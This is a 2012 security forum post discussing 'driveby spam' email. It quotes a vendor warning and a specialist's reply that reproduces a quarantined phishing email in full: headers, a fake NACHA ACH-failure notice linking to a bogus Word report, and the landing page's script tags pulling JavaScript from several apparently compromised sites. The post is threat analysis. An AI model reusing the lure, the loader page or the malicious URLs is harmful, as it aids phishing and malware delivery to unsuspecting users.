Author Topic: Driveby spam ??  (Read 7489 times)

0 Members and 1 Guest are viewing this topic.

February 03, 2012, 12:00:58 pm
Read 7489 times

john_

  • Jr. Member

  • Offline
  • **

  • 31
  • Personal Text
    In God we trust, all others we virus scan
    • Virus removal tools
Here is an interesting article:

Driveby Spam Infects PCs When E-Mail Is Opened

Code: [Select]
http://www.eleven.de/press-release/items/warning-driveby-spam-infects-pcs-when-e-mail-is-opened.html
where is stated that an user can get infected by malware just by opening an email, without to click any link or open an attachment.Here is an excerpt:
Quote
The eleven Research Team has issued a warning about a new and particularly dangerous e-mail-borne method to infect PCs with viruses and Trojans. This driveby spam automatically downloads malware when the e-mail is opened in the e-mail client. Previous malware e-mails required the user to click on a link or open an attachment for the PC to be infected. The new generation of e-mail-borne malware consists of HTML e-mails which contain a JavaScript which automatically downloads malware when the e-mail is opened. This is similar to so-called driveby downloads which infect a PC by opening an infected Website in the browser. Driveby spam eliminates the detour via attachments or links in the e-mail and also affects cautious users which would never open an unknown attachment or link.

I have asked cleanmx member who is involved in email security field about this, I share his reply here with his permission:

-----------------------------------------
these mails do exist, but i have never seen a thunderbird installation rendering a html email and executing javascript without user permission !

within Microsoft products these mails may really be opened without user consent

example:
Code: [Select]
X-Quarantine-ID: <WQ2MhcuQdvuj>
X-Virus-Scanned: by netpilot GmbH at clean-mx.de
X-Spam-Flag: YES
X-Spam-Score: 39.89
X-Spam-Level: ***************************************
X-Spam-Status: Yes, score=39.89 tagged_above=-999 required=5.1
tests=[BAYES_05=-1.11, CLEANMXHASH=38.5, DNS_FROM_RFC_BOGUSMX=0.945,
HTML_MESSAGE=0.001, HTML_MIME_NO_HTML_TAG=0.097, MIME_HTML_ONLY=1.457]
Received: from relayn.netpilot.net ([127.0.0.1])
by localhost (relayn.netpilot.net [127.0.0.1]) (clean-mx, port 10024)
with ESMTP id WQ2MhcuQdvuj for <info@hogri.de>;
Tue, 31 Jan 2012 13:17:41 +0100 (CET)
Received-SPF: none (gtllimited.com: No applicable sender policy available) receiver=newtunix.netpilot.net;
identity=mfrom; envelope-from="manishp@gtllimited.com"; helo=globalproserv.com; client-ip=202.140.139.24
Received: from globalproserv.com (relay1.ghc.in [202.140.139.24])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by relayn.netpilot.net (Postfix) with ESMTPS id 5D81539C05D
for <info@hogri.de>; Tue, 31 Jan 2012 12:53:09 +0100 (CET)
Received: (qmail 6287 invoked by uid 65205); 31 Jan 2012 11:46:26 -0000
Received: from 10.101.9.18 by Relay2 (envelope-from <manishp@gtllimited.com>, uid 0) with qmail-scanner-1.25
 (clamscan: 0.60. 
 Clear:RC:1(10.101.9.18):.
 Processed in 0.023961 secs); 31 Jan 2012 11:46:26 -0000
Received: from unknown (HELO MasterMailserver.globalproserv.com) ([10.101.9.18])
          (envelope-sender <manishp@gtllimited.com>)
          by 0 (qmail-ldap-1.03) with SMTP
          for <info@hogri.de>; 31 Jan 2012 11:46:26 -0000
Received: from globalproserv.com (MasterMailserver [127.0.0.1])
by MasterMailserver.globalproserv.com (Postfix-outgoing) with ESMTP id 8531FA74063
for <info@hogri.de>; Tue, 31 Jan 2012 17:16:25 +0530 (IST)
Received: (qmail 32022 invoked by uid 65205); 31 Jan 2012 11:46:25 -0000
Received: from 197.0.93.197 by MasterMailserver (envelope-from <manishp@gtllimited.com>, uid 0) with qmail-scanner-1.25

 (clamscan: 0.60. 
 Clear:RC:0(197.0.93.197):.
 Processed in 0.425168 secs); 31 Jan 2012 11:46:24 -0000
Received: from unknown (HELO gtllimited.com) (manishp@gtllimited.com@[197.0.93.197])
          (envelope-sender <manishp@gtllimited.com>)
          by 0 (qmail-ldap-1.03) with AES256-SHA encrypted SMTP
          for <info@hobbyfish.cl>; 31 Jan 2012 11:46:23 -0000
Message-ID: <AC58AC81.85934259@gtllimited.com>
Date: Tue, 31 Jan 2012 10:45:40 -0100
Reply-To: "Info" <manishp@gtllimited.com>
From: "Info" <manishp@gtllimited.com>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.8.1.24) Gecko/20100228 Thunderbird/2.0.0.24
MIME-Version: 1.0
To: <info@hobbyfish.cl>
Subject: ACH transaction failure report
Content-Type: text/html;
charset="us-ascii"
Content-Transfer-Encoding: 7bit

<p><font face="Verdana">The ACH transaction ID: 822430377836, that had been
sent from your bank account lately, was declined by the
recipient.</font></p>
<p> </p>
<table width="100%" border="1">
  <tr>
    <td colspan="2"><div align="center"><font face="Verdana">ACH
transaction declined</font></div></td>
  </tr>
  <tr>
    <td><font face="Verdana">Transaction ID: </font></td>
    <td><font face="Verdana">822430377836</font></td>
  </tr>
  <tr>
    <td><font face="Verdana">Details:</font></td>
    <td><font face="Verdana">please see the report below for
details</font></td>
  </tr>
  <tr>
    <td><font face="Verdana">Transaction Report </font></td>
    <td><font face="Verdana"><a
href="http://neumaticosinternet.com/RrGYPYMN/index.html">
report_822430377836.doc</a> (Microsoft Word Document) </font></td>
  </tr>
</table>
<p> </p><p> </p>

</font>
<p><font size=2 color=gray>13450 Sunrise Valley Drive,
Suite 100<br />
Herndon, VA 20171</font></p>

<font size=2 color=gray><p>2011 NACHA - The Electronic Payments
Association</p>
</font>

in turn this document link resolves into:

Code: [Select]
<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="http://blackbearwv.com/5rMdV7dy/js.js"></script>
<script type="text/javascript" src="http://docup.lazio.it/9XNi14tc/js.js"></script>
<script type="text/javascript" src="http://buddhastrust.com/8KTkT8WN/js.js"></script>
<script type="text/javascript" src="http://relax-motion.de/Njq2tqMt/js.js"></script>
<script type="text/javascript" src="http://zsk.nerdvana.net.au/8eQq8RoH/js.js"></script>

</html>

I really never have seen such a behavioral within thunderbird seamonkey etc.....

-------------------------------------------------------